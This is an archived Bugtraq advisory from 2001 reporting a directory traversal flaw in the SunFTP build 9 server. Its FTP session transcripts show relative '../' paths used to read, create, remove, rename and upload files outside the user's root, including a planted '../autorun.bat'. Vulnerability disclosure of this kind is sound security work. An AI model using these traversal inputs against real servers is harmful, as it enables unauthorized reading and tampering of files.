Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Sunftp build9(1) - ftp server Vulnerability

Sunftp build9(1) - ftp server Vulnerability

From: <se00020_at_LION.CC>
Date: Fri, 2 Mar 2001 12:14:23 -0000

It is possible to break out of the root directory by
using relative paths

e:\crap was used as homedir. of user test.

#the get command#

getting files from outside of the root dir.

220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden
179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden
1443000,00KB/s

#the mkdir command#

without priv. to create directories:

ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.

hell!it's getting worse...

#the rmdir command#

without any priv. to remove anything

ftp> rmdir ../test
250 '/../test': directory removed.

this only works with empty directories

#the rename command#

it is possible to rename files outside of the root
directory without
permissions.And it is also possible to move files with
the rename command,
when the filename is known.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden
240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed
to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden
314000,00KB/s

#the put command#

If you have permission to upload files, you can put
these files outside of
the homedir.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden
314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok

Solution

no quick bugfix. Use with care

I tried to contact the authors, but their webpage
seems to be down.

se00020_at_lion.cc or
se00020_at_fhs-hagenberg.ac.at
Received on Mar 02 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]